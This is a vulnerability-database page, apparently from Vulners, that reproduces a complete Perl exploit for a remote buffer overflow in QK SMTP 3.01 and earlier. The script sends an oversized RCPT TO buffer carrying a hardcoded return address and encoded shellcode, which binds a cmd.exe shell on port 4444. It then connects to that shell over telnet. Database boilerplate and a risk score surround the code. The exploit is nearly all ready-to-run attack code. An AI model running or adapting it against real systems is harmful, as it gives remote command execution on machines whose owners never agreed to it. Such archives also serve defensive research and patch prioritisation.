Vulners
Lucene search
QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl)
#!/bin/perl
#
#http://www.securityfocus.com/bid/20681
#
# tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it
if (@ARGV < 1) {
print "--------------------------------------------------------------------\n";
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";
print "--------------------------------------------------------------------\n";
}
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
#my $eip="\x43\x43\x43\x43";
my $eip="\x8f\x29\x46\x00"; #call esp in QKSmtpServer3.exe
$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";
$jmpback = "\x50\x73".
"\x54\x73".
"\x58\x73".
"\xb0".
"\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x50\x73".
"\xc3\x73";
my $buffer =("\x41"x296).$eip.("\x73"x2228).$sc.("\x45"x820).$jmpback."\x00";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$request = "helo acaro" . "\r\n";
send $socket, $request, 0;
print "[+] Sent helo request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
$request = "mail from: [email protected]" . "\r\n";
send $socket, $request, 0;
print "[+] Sent mail from request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
$request = "rcpt to: " . $buffer . "\r\n";
send $socket, $request, 0;
print "[+] Sent rcpt to request\n";
print " + connect on 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1